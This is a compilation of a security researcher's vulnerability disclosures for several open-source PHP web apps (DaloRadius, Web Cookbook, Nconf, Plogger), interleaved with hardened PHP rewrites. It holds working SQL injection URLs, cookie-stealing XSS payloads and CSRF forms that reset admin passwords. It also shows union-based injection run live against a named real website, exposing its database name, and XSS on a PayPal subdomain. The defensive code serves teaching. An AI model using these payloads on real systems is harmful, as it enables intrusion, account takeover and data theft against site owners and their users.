$username = stripslashes($_POST['username']);
$password1 = stripslashes($_POST['password']);
$password2 = stripslashes($_POST['confirm_password']);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass', '$firstname', '$lastname', '$company', '$address', '$address2', '$city', '$country', '$state', '$postcode', '$telnumber', '$faxnumber', '$emailaddress', '$startingcredits', '1', '', '', '$timestamp') ")
Only stripslashes() is applied, which does not protect against SQL injection: it removes backslashes but leaves quotes and SQL keywords intact, so the values are still concatenated straight into the query.
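As an added example (not FHM's code), the cookie lookup from home.php and the INSERT from register.php rewritten with PDO prepared statements, so cookie and POST values travel to MySQL as data and cannot change the query's structure. It assumes a PDO connection `$pdo`, the `clients` table and column order shown in the advisory, and keeps the advisory's own `$md5pass`, `$startingcredits` and `$timestamp` variables as inputs; the function names are this example's.

```php
<?php
// Added example, not the vendor's code. Hardened counterparts of the FHM
// home.php auth() lookup and the register.php INSERT, using PDO prepared
// statements instead of string concatenation. Assumes a PDO connection $pdo.

declare(strict_types=1);

function connectDb(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
        // Server-side prepares; emulated mode would interpolate on the client.
        PDO::ATTR_EMULATE_PREPARES   => false,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ]);
}

/**
 * Hardened counterpart of auth(): the three cookie values are bound, never
 * concatenated. clientid is validated as an integer before it reaches the
 * driver. Returns the matching client row, or null when nothing matches.
 */
function authFromCookies(PDO $pdo, array $cookie): ?array
{
    if (!isset($cookie['clientuser'], $cookie['clientpass'], $cookie['clientid'])) {
        return null;
    }
    $clientid = filter_var($cookie['clientid'], FILTER_VALIDATE_INT);
    if ($clientid === false) {
        return null; // a non-numeric id is rejected here, not inside SQL
    }
    $stmt = $pdo->prepare(
        'SELECT * FROM clients WHERE id = :id AND username = :user AND password = :pass'
    );
    $stmt->bindValue(':id',   $clientid,             PDO::PARAM_INT);
    $stmt->bindValue(':user', $cookie['clientuser'], PDO::PARAM_STR);
    $stmt->bindValue(':pass', $cookie['clientpass'], PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch();
    return $row === false ? null : $row;
}

/**
 * Hardened counterpart of the register.php INSERT. Every POST value is a
 * bound parameter and stripslashes() is dropped, because binding handles
 * quoting. Column order matches the original INSERT INTO clients VALUES(...).
 * $md5pass, $startingcredits and $timestamp are the advisory's own variables.
 */
function insertClient(PDO $pdo, array $post, string $md5pass, int $startingcredits, int $timestamp): int
{
    $params = [
        $post['username']      ?? '',
        $md5pass,
        $post['first_name']    ?? '',
        $post['last_name']     ?? '',
        $post['company']       ?? '',
        $post['address']       ?? '',
        $post['address_2']     ?? '',
        $post['city']          ?? '',
        $post['country']       ?? '',
        $post['state_region']  ?? '',
        $post['postal_code']   ?? '',
        $post['tel_number']    ?? '',
        $post['fax_number']    ?? '',
        $post['email_address'] ?? '',
        $startingcredits,
        $timestamp,
    ];
    // 16 placeholders, one per entry in $params; the literals stay literals.
    $sql = "INSERT INTO clients VALUES ('', ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, '1', '', '', ?)";
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return (int) $pdo->lastInsertId();
}
```

The detection-side lesson is the same for every file in the list: grep the code base for `mysql_query(` calls whose argument contains `$_GET`, `$_POST`, `$_COOKIE` or `$_REQUEST` inside the string, and treat each hit as a finding until it has been converted to a bound parameter.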
#independent Pakistani Security Researcher
Hi, some days ago I found an XSS bug in PayPal services but was not eligible for the bounty; well, no worries, I will try again :D . . .
It was a subdomain of billmelater.com.
The bug can be used for phishing attacks etc.
domain: http://wwwb.search.billmelater.com
They are getting an integer value from the GET field and using it as the time to redirect you to other pages..
Vuln Links:
http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert(document.cookie)</script>
http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert("XSS by Saadat")</script>
ScreenShot
So this is for today :)
#IndependentPakistaniSecurityResearcher
Hi, I was just browsing SourceForge and saw a script with more than a thousand downloads per week, so it was not bad to give it a pentest, and I found some stuff in it :)
Exploit Links
http://www.exploit-db.com/exploits/24849
http://1337day.com/exploit/20513
http://packetstormsecurity.com/files/120828/DaloRadius-CSRF-XSS-SQL-Injection.html
Exploit
-------------------------------------------------------------------------
# Software : DaloRadius SQLi / CSRF / XSS
# Author : Saadat Ullah , saadi_linux@rocketmail.com
# Author home : http://security-geeks.blogspot.com
# Date : 15/3/13
# Vendors : http://www.daloradius.com/
# Download Link : http://sourceforge.net/projects/daloradius/
-------------------------------------------------------------------------
+---+[ CSRF Change Admin Password ]+---+
DaloRadius is not using any security tokens to protect against CSRF. It is vulnerable to CSRF in all locations.
Some of them:
Change admin password
<form action="daloradius/config-operators-edit.php" method="post">
<input type="hidden" value="administrator" name="operator_username" />
<div class="tabber">
<div class="tabbertab" title="Operator Info">
<fieldset>
<h302></h302>
<br/>
<label for='operator_password' class='form'></label>
<input name='password' id='password'
type='hidden' value='radius1' tabindex=101 />
<br/>
<br/><br/>
<hr><br/>
<input type='submit' name='submit' value='Apply' class='button' />
PoC
Request headers:
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/daloradius/config-operators-edit.php?operator_username=administrator
Cookie: PHPSESSID=5f528764d624db129645be2e9
Content-Type: application/x-www-form-urlencoded
Content-Length: 3540
Post Data:
operator_username=administrator&password=radius1&submit=Apply
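As an added example (not daloRADIUS code), the synchronizer-token pattern that closes this class of bug for a form such as config-operators-edit.php: a random per-session token is embedded in every state-changing form and compared in constant time on POST. A page on another origin cannot read the victim's session token, so a forged form like the one above fails the check before any password is changed. `CSRF_FIELD`, `csrfToken()`, `csrfValid()` and `handleOperatorEdit()` are names chosen for this example.

```php
<?php
// Added example, not daloRADIUS code: synchronizer-token CSRF protection for a
// password-change form. Requires session_start() before use.

declare(strict_types=1);

const CSRF_SESSION_KEY = 'csrf_token'; // session slot (example's own name)
const CSRF_FIELD       = 'csrf_token'; // hidden form field (example's own name)

/** Issue the per-session token once, then reuse it for the session's lifetime. */
function csrfToken(): string
{
    if (empty($_SESSION[CSRF_SESSION_KEY])) {
        $_SESSION[CSRF_SESSION_KEY] = bin2hex(random_bytes(32)); // 256 bits from a CSPRNG
    }
    return $_SESSION[CSRF_SESSION_KEY];
}

/** Hidden input to place inside every <form method="post"> the application renders. */
function csrfField(): string
{
    return '<input type="hidden" name="' . CSRF_FIELD . '" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * Validate the submitted token. hash_equals() keeps the comparison constant
 * time; the is_string() check stops array-shaped input (csrf_token[]=x) from
 * reaching it.
 */
function csrfValid(array $post): bool
{
    if (empty($_SESSION[CSRF_SESSION_KEY]) || !isset($post[CSRF_FIELD])) {
        return false;
    }
    if (!is_string($post[CSRF_FIELD])) {
        return false;
    }
    return hash_equals($_SESSION[CSRF_SESSION_KEY], $post[CSRF_FIELD]);
}

/** Handler sketch: a POST without a valid token is refused with 403. */
function handleOperatorEdit(array $post): void
{
    if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        return; // render the form; csrfField() goes inside it
    }
    if (!csrfValid($post)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // ... update the operator here, with a prepared statement ...
}
```

Checking the Referer header, as the PoC request shows it, is not a substitute: it is optional, stripped by some proxies and privacy settings, and easy to omit from a forged request. Marking the session cookie `SameSite=Lax` or `Strict` (supported by PHP 7.3+ `session_set_cookie_params()`) is a useful second layer, but the token check is what makes the form itself safe.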
+---+[ SQL Injection ]+---+
There are multiple SQLi in the script; some are:
http://localhost/daloradius/acct-ipaddress.php?orderBy=[SQLi]
http://localhost/daloradius/acct-ipaddress.php?ipaddress=[SQLi]
http://localhost/daloradius/acct-date.php?orderBy=[SQLi]
http://localhost/daloradius/acct-date.php?username=[SQLi] etc
Proof Of Concept
In acct-ipaddress.php
isset($_GET['orderBy']) ? $orderBy = $_GET['orderBy'] : $orderBy = "radacctid";
isset($_GET['orderType']) ? $orderType = $_GET['orderType'] : $orderType = "asc";
isset($_GET['ipaddress']) ? $ipaddress = $_GET['ipaddress'] : $ipaddress = "";
.
.
.
$sql = "SELECT ".$configValues['CONFIG_DB_TBL_RADACCT'].".RadAcctId, ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".name as hotspot, ".$configValues['CONFIG_DB_TBL_RADACCT'].".UserName, radacct.FramedIPAddress, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStartTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStopTime, radacct.AcctSessionTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctInputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctOutputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctTerminateCause, ".$configValues['CONFIG_DB_TBL_RADACCT'].".NASIPAddress FROM ".$configValues['CONFIG_DB_TBL_RADACCT']." LEFT JOIN ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS']." ON ".$configValues['CONFIG_DB_TBL_RADACCT'].".calledstationid = ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".mac WHERE FramedIPAddress='$ipaddress';";
In acct-date.php
if ( (isset($_GET['username'])) && ($_GET['username']) ) {
$username = $_GET['username'];
$sql = "SELECT ".$configValues['CONFIG_DB_TBL_RADACCT'].".RadAcctId, ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".name as hotspot, ".$configValues['CONFIG_DB_TBL_RADACCT'].".UserName, ".$configValues['CONFIG_DB_TBL_RADACCT'].".FramedIPAddress, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStartTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStopTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctSessionTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctInputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctOutputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctTerminateCause, ".$configValues['CONFIG_DB_TBL_RADACCT'].".NASIPAddress FROM ".$configValues['CONFIG_DB_TBL_RADACCT']." LEFT JOIN ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS']." ON ".$configValues['CONFIG_DB_TBL_RADACCT'].".calledstationid = ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".mac WHERE AcctStartTime>'$startdate' and AcctStartTime<'$enddate' and UserName like '$username';";
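The two queries above mix two kinds of untrusted input: data values (`ipaddress`, `username`, dates), which belong in bound parameters, and identifiers (`orderBy`, `orderType`), which cannot be bound and must be mapped through an allow-list instead. As an added example (not daloRADIUS code), the acct-ipaddress.php query rebuilt that way; `$configValues` keys and table aliases follow the advisory, `$pdo` is an assumed PDO connection, and `ORDERABLE_COLUMNS`, `safeOrderBy()`, `safeOrderType()` and `accountingByIp()` are this example's names.

```php
<?php
// Added example, not daloRADIUS code: the acct-ipaddress.php query with the
// sort column/direction taken from an allow-list and the IP address bound.
// Assumes a PDO connection $pdo and the advisory's $configValues table names.

declare(strict_types=1);

// Lower-cased request value => the exact column identifier to emit.
const ORDERABLE_COLUMNS = [
    'radacctid'       => 'RadAcctId',
    'username'        => 'UserName',
    'framedipaddress' => 'FramedIPAddress',
    'acctstarttime'   => 'AcctStartTime',
    'acctstoptime'    => 'AcctStopTime',
];

/** Map a user-supplied sort column to a known identifier; default RadAcctId. */
function safeOrderBy(?string $requested): string
{
    $key = strtolower((string) $requested);
    return ORDERABLE_COLUMNS[$key] ?? 'RadAcctId';
}

/** Only two legal values; anything else falls back to ASC. */
function safeOrderType(?string $requested): string
{
    return strtolower((string) $requested) === 'desc' ? 'DESC' : 'ASC';
}

function accountingByIp(PDO $pdo, array $configValues, array $get): array
{
    $ip = (string) ($get['ipaddress'] ?? '');
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return []; // not an IP address: nothing to look up, nothing sent to MySQL
    }

    // Table names come from the application's own config, never from the request.
    $radacct   = $configValues['CONFIG_DB_TBL_RADACCT'];
    $hotspots  = $configValues['CONFIG_DB_TBL_DALOHOTSPOTS'];
    $orderBy   = safeOrderBy($get['orderBy'] ?? null);      // identifier: allow-listed
    $orderType = safeOrderType($get['orderType'] ?? null);  // keyword: allow-listed

    $sql = "SELECT $radacct.RadAcctId, $hotspots.name AS hotspot, $radacct.UserName,
                   $radacct.FramedIPAddress, $radacct.AcctStartTime, $radacct.AcctStopTime,
                   $radacct.AcctSessionTime, $radacct.AcctInputOctets, $radacct.AcctOutputOctets,
                   $radacct.AcctTerminateCause, $radacct.NASIPAddress
            FROM $radacct
            LEFT JOIN $hotspots ON $radacct.calledstationid = $hotspots.mac
            WHERE $radacct.FramedIPAddress = :ip
            ORDER BY $radacct.$orderBy $orderType";

    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':ip', $ip, PDO::PARAM_STR); // data value: bound
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

The same split applies to acct-date.php: `$username`, `$startdate` and `$enddate` are bound values, and the `like` pattern should be built in PHP from the bound value rather than spliced into the SQL text.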
+---+[ XSS ]+---+
http://localhost/daloradius/rep-logs-daloradius.php?daloradiusLineCount=50&daloradiusFilter=<script>alert(document.cookie);</script>
http://localhost/daloradius/mng-search.php?username=<script>alert(document.cookie);</script>
#Independent Pakistani Security Researcher
Exploit Links:
http://www.exploit-db.com/exploits/24742/
http://packetstormsecurity.com/files/120760/Web-Cookbook-SQL-Injection.html
http://1337day.com/exploit/20501
Exploit
# Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah , saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3
# SQL Injection
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
initDB();
echo "<div class=\"rdisplay\">\n";
$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; // using an unsanitized field in the query
$result = mysql_query($query);
.
.
All GET fields are vulnerable to SQLi
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#PoC
In searchrecipe.php
$title = $_GET['title'];
$prefix = $_GET['prefix'];
$preparation = $_GET['preparation'];
$postfix = $_GET['postfix'];
$tipp = $_GET['tipp'];
$ingredient = $_GET['ingredient'];
.
.
.
if ($title != "") {
$sstring = "a.title LIKE '%$title%' ";
}
.
.
searchRecipe($mode, $sstring);
.
.
In function searchRecipe()
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
PoC
$sstring = $_GET['sstring'];
if ($sstring != "") {
searchRecipe(0, $sstring);
.
.
.
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
A simple non-persistent XSS
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=
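The two Web Cookbook sinks above differ in an instructive way: showtext.php drops `$kategorie` into the query unquoted, so no quote character is needed to break out, while searchrecipe.php puts `$sstring` inside a `LIKE '%...%'` pattern, where `%` and `_` have meaning even after the quotes are made safe. As an added example (not Web Cookbook's code), both rewritten: the id is validated and bound as an integer, and the search text is escaped for `LIKE` and bound. Table and column names are the advisory's; `$pdo` is an assumed PDO connection and `likeLiteral()` is this example's helper.

```php
<?php
// Added example, not Web Cookbook's code: showText() with a typed integer id and
// searchRecipe() with a bound LIKE pattern whose wildcards are escaped, so a
// search for "100%" matches that text literally instead of every row.
// Assumes a PDO connection $pdo (ATTR_EMULATE_PREPARES = false).

declare(strict_types=1);

/** Replacement for `WHERE id = $kategorie`: validate, then bind as an integer. */
function showText(PDO $pdo, $mode): ?array
{
    $id = filter_var($mode, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // anything that is not a positive integer never reaches MySQL
    }
    $stmt = $pdo->prepare('SELECT * FROM dat_texte WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/**
 * Escape LIKE metacharacters so user text is matched literally. "!" is used
 * as the escape character (named in the ESCAPE clause below) to stay clear of
 * backslash handling; it is escaped first so later replacements stay intact.
 */
function likeLiteral(string $s): string
{
    return str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $s);
}

/**
 * Replacement for searchRecipe(): the pattern is built in PHP and bound.
 * Two named placeholders are used because one name cannot be bound twice
 * with server-side prepares. The join is written out explicitly.
 */
function searchRecipe(PDO $pdo, string $sstring): array
{
    if ($sstring === '') {
        return [];
    }
    $pattern = '%' . likeLiteral($sstring) . '%';
    $sql = "SELECT DISTINCT a.id, a.title
            FROM das_rezept a
            JOIN dat_ingredient b ON a.id = b.recipe
            WHERE a.title LIKE :p1 ESCAPE '!' OR b.description LIKE :p2 ESCAPE '!'
            ORDER BY a.title";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':p1', $pattern, PDO::PARAM_STR);
    $stmt->bindValue(':p2', $pattern, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

The `title` field also shows the reflected XSS noted above; wherever `$title` or a result row is echoed back into the page, it needs `htmlspecialchars($s, ENT_QUOTES, 'UTF-8')` at the point of output, independently of the SQL fix.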
#Independent Pakistani Security Researcher
Exploit Live Demo
kochen.joachim-gabel.de/showtext.php?mode=603' [Union Based Injection]
Database Name:
db394647325
http://www.kochen.joachim-gabel.de/showtext.php?mode=-603%20union%20select%201,2,table_name,4,5%20from%20information_schema.tables%20where%20table_schema=database%28%29--
http://www.kochen.joachim-gabel.de/showtext.php?mode=-603%20union%20select%201,2,database%28%29,4,5--
etc...
Hi, today Nconf v1.3. Ahh, the script is highly insecure, so I just reported a few of them..
Exploit Links:
http://1337day.com/exploit/20475
http://packetstormsecurity.com/files/120628/Nconf-1.3-SQL-Injection-Cross-Site-Scripting.html
# Exploit Title: nconf handle_item.php,Modify_attr.php etc Multiple Sql injection
# Date: 2013/3/4
# Exploit Author: Saadat Ullah,saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/nconf/files/nconf/
# Vendors: http://www.nconf.org/
# Author HomePage: http://security-geeks.blogspot.com/
# Version: nconf 1.3
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3
Nconf is vulnerable to SQL injection in most of its files; they didn't sanitize any GET/POST fields.
Some of them are:
Blind SQLi in handle_item.php on the id parameter
handle_item.php?id=1'
PoC
$query2 .= ' AND id_item <> '.$_GET["id"];
delete_attr.php, POST data:
id=15'&name=&delete=yes&submit=Delete
PoC
id via GET field:
$query = 'SELECT attr_name, config_class FROM ConfigAttrs, ConfigClasses WHERE id_attr='.$_GET["id"].' AND fk_id_class=ConfigClasses.id_class';
and id via POST field:
$query = 'DELETE FROM ConfigAttrs WHERE id_attr='.$_POST["id"];
clone_host_write2db.php: again on the id parameter. There are many more...
A simple reflected XSS
http://localhost/nconf/handle_item.php?item=XSS Vector
PoC
$item_class = $_GET["item"];
.
.
echo without sanitization:
echo ''.ucfirst($handle_action).' '.$item_class.'';
A local path disclosure
http://localhost/nconf/call_file.php?ajax_file=service_list.php&debug=yes
POST data: host_id=5372&highlight_service=5373&class=a
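The reflected XSS in handle_item.php is the classic case of a request value written into HTML with no encoding. As an added example (not Nconf's code), the same `echo` with output encoding chosen for the context the value lands in: HTML text and attributes get `htmlspecialchars()`, and a value placed inside a `<script>` block gets JSON encoding with the HEX flags so `</script>` cannot terminate the block. `$handle_action` and `$item_class` are the advisory's variables; `e()`, `js()` and `renderHeading()` are this example's helpers.

```php
<?php
// Added example, not Nconf's code: the handle_item.php heading rendered with
// context-aware output encoding instead of a raw echo of $_GET["item"].

declare(strict_types=1);

/** HTML text and attribute context: & < > " ' become entities, invalid UTF-8 is replaced. */
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * JavaScript string-literal context inside <script>: JSON encoding with the
 * HEX flags turns < > & ' " into \uXXXX escapes, so neither </script> nor a
 * closing quote can be smuggled in. Falls back to an empty literal on bad input.
 */
function js(string $s): string
{
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT) ?: '""';
}

/**
 * Hardened counterpart of:
 *   echo ''.ucfirst($handle_action).' '.$item_class.'';
 * Both values are encoded at the point of output. The result for the
 * advisory's payload is literal text on the page, not a running script.
 */
function renderHeading(string $handle_action, string $item_class): string
{
    return e(ucfirst($handle_action)) . ' ' . e($item_class);
}

/** Example of the same value reused in an inline script, with the matching encoder. */
function renderItemScript(string $item_class): string
{
    return '<script>var itemClass = ' . js($item_class) . ';</script>';
}

// Illustration (constructed input): the marker string below is inert after encoding.
$item_class    = (string) ($_GET['item'] ?? '<b>demo</b>');
$handle_action = 'add';
echo renderHeading($handle_action, $item_class);   // &lt;b&gt;demo&lt;/b&gt; shown as text
echo renderItemScript($item_class);                 // "\u003Cb\u003Edemo\u003C\/b\u003E"
```

Encoding at output is the fix; validating `item` against the set of item classes the page actually handles is a worthwhile extra check, and a `Content-Security-Policy` header without `unsafe-inline` limits the impact of anything that slips through either layer.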
#Independent Pakistani Security Researcher
Hi, 2 days back my friend needed a CMS for an image gallery, so after finding one I pentested the script and found it highly insecure. The complete exploit can be viewed here.
1337day: http://1337day.com/exploit/20470
PacketStorm: http://packetstormsecurity.com/files/120619/PloggerGallery-1.0-RC1-CSRF-XSS-SQL-Injection.html
PoC
-------------------------------------------------------------------------
# Software : PloggerGallery Version 1.0 RC1
# Author : Saadat Ullah
# Date : 2/3/13
# Dork : Use Ur Mind
# Software Link : http://www.plogger.org/download/
-------------------------------------------------------------------------
+---+[ Feedback.php Sqli ]+---+
Injectable on the entries_per_page parameter in plog-feedback.php
http://localhost/plogger/plog-admin/plog-feedback.php?entries_per_page=5'
PoC
if (isset($_REQUEST['entries_per_page'])) {
$_SESSION['entries_per_page'] = $_REQUEST['entries_per_page'];
} else if (!isset($_SESSION['entries_per_page'])) {
$_SESSION['entries_per_page'] = 20;
}
.
.
.
$limit = "LIMIT ".$first_item.", ".$_SESSION['entries_per_page'];
.
.
// Generate javascript init function for ajax editing
$query = "SELECT *, UNIX_TIMESTAMP(`date`) AS `date` from ".PLOGGER_TABLE_PREFIX."comments WHERE `approved` = ".$approved." ORDER BY `id` DESC ".$limit;
$result = run_query($query);
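The entries_per_page sink is worth a closer look because the value is laundered through `$_SESSION` before it reaches the query, which hides the taint from a casual review, and because it lands in a `LIMIT` clause, where a bound value must be an integer. As an added example (not Plogger's code), the pagination rebuilt with the value validated and range-clamped before it is stored in the session and then bound with `PDO::PARAM_INT`. `PLOGGER_TABLE_PREFIX` is the advisory's constant (given an assumed default here); `$pdo` is an assumed PDO connection and `entriesPerPage()` / `fetchComments()` are this example's names.

```php
<?php
// Added example, not Plogger's code: plog-feedback.php pagination with the page
// size validated, clamped and stored in the session, and LIMIT/OFFSET bound as
// integers. Assumes a PDO connection $pdo with ATTR_EMULATE_PREPARES = false.

declare(strict_types=1);

if (!defined('PLOGGER_TABLE_PREFIX')) {
    define('PLOGGER_TABLE_PREFIX', 'plogger_'); // assumed default for this example
}

const MIN_PER_PAGE = 1;
const MAX_PER_PAGE = 200;

/**
 * Accept only an integer within range. Anything else leaves the session value
 * untouched, so the session can never carry a string such as "5'" into SQL.
 * Defaults to 20, as the original does.
 */
function entriesPerPage(array $request, array &$session): int
{
    if (isset($request['entries_per_page'])) {
        $n = filter_var($request['entries_per_page'], FILTER_VALIDATE_INT,
            ['options' => ['min_range' => MIN_PER_PAGE, 'max_range' => MAX_PER_PAGE]]);
        if ($n !== false) {
            $session['entries_per_page'] = $n;
        }
    }
    if (!isset($session['entries_per_page'])) {
        $session['entries_per_page'] = 20;
    }
    return (int) $session['entries_per_page'];
}

/**
 * LIMIT and OFFSET are bound with bindValue(..., PDO::PARAM_INT). Passing them
 * in the array given to execute() would send them as quoted strings, which
 * MySQL rejects in a LIMIT clause; that is the usual reason LIMIT ends up
 * concatenated, and this is the safe alternative.
 */
function fetchComments(PDO $pdo, int $approved, int $page, int $perPage): array
{
    $offset = max(0, $page - 1) * $perPage;
    $sql = 'SELECT *, UNIX_TIMESTAMP(`date`) AS `date` FROM `' . PLOGGER_TABLE_PREFIX . 'comments`'
         . ' WHERE `approved` = :approved ORDER BY `id` DESC LIMIT :offset, :limit';
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':approved', $approved, PDO::PARAM_INT);
    $stmt->bindValue(':offset',   $offset,   PDO::PARAM_INT);
    $stmt->bindValue(':limit',    $perPage,  PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage sketch (session_start() assumed):
// $perPage = entriesPerPage($_REQUEST, $_SESSION);
// $rows    = fetchComments($pdo, $approved, (int) ($_GET['page'] ?? 1), $perPage);
```

The upper bound matters beyond injection: an unbounded page size turns the same parameter into a cheap way to make the server build a very large result set.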
+---+[ CSRF In Admin Panel ]+---+
Plogger is not using any parameter or security token to protect against CSRF, so it is vulnerable to CSRF in all locations inside the admin panel..
+---+[ XSS ]+---+
There are multiple XSS in Plogger, like editing a comment inside the admin panel. They are filtering the comments for normal users but not for the admin.
And as it is CSRF everywhere, we can edit a comment via CSRF and change it to any XSS vector..
XSS
http://localhost/plogger/plog-admin/plog-feedback.php
Edit a comment with any XSS vector, or just do it via CSRF.
Upload a file and set its name to any XSS vector..
http://localhost/plogger/plog-admin/plog-upload.php
It can be exploited in many ways, like:
CSRF + SQLi inside the admin panel, which is described above.
XSS in edit comment: CSRF + XSS
<html>
<head>
<form class="edit width-700" action="localhost/plogger/plog-admin/plog-feedback.php" method="post">
<div style="float: right;"><img src="http://localhost/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
<div>
<div class="strong">Edit Comment</div>
<p>
<label class="strong" accesskey="a" for="author">Author:</label><br />
<input size="65" name="author" id="author" value="<script>alert('Hi');</script>" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="e" for="email">Email:</label><br />
<input size="65" name="email" id="email" value="asdf@localhost.com" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="u" for="url">Website:</label><br />
<input size="65" name="url" id="url" value="http://adsf.com" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="c" for="comment">Comment:</label><br />
<textarea cols="62" rows="4" name="comment" id="comment"><script>alert('Hi');</script></textarea>
</p>
<input type="hidden" name="pid" value="4" />
<input type="hidden" name="action" value="update-comment" />
<input class="submit" name="update" value="Update" type="submit" />
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
</div>
</form>
Another XSS
http://localhost/plogger/plog-admin/plog-manage.php?action=edit-picture&id=1
Edit the caption to an XSS vector inside the admin panel..
Again CSRF + XSS
<form class="edit width-700" action="localhost/plogger/plog-admin/plog-manage.php?level=pictures&id=1" method="post">
<div style="float: right;"><img src="http://localhost/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
<div>
<div class="strong">Edit Image Properties</div>
<p>
<label class="strong" accesskey="c" for="caption"><em>C</em>aption:</label><br />
<input size="62" name="caption" id="caption" value="<script>alert(document.cookie);</script>" type="hidden"/>
</p>
<p>
<label class="strong" for="description">Description:</label><br />
<textarea name="description" id="description" cols="60" rows="5"><script>alert(document.cookie);</script></textarea>
</p>
<p><input type="checkbox" id="allow_comments" name="allow_comments" value="1" checked="checked" /><label class="strong" for="allow_comments" accesskey="w">Allo<em>w</em> Comments?</label></p>
<input type="hidden" name="pid" value="1" />
<input type="hidden" name="action" value="update-picture" />
<input class="submit" name="update" value="Update" type="submit" />
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
</div>
</form>
CSRF Admin Password Reset And XSS
plog-options.php
<form action="http://localhost/plogger/plog-admin/plog-options.php" method="post">
<table class="option-table" cellspacing="0">
<tbody><tr class="alt">
<td class="left"><label for="admin_username"></label></td>
<td class="right"><input size="40" id="admin_username" name="admin_username" value="admin" type="hidden"></td>
</tr>
<tr>
<td class="left"><label for="admin_email"></label></td>
<td class="right"><input size="40" id="admin_email" name="admin_email" value="localhost@hotmail.com" type="hidden"></td>
</tr>
<tr class="alt">
<td class="left"><label for="admin_password"></label></td>
<td class="right"><input size="40" id="admin_password" name="admin_password" value="123456789" type="hidden"></td>
<tr>
<td class="left"><label for="confirm_admin_password"></label></td>
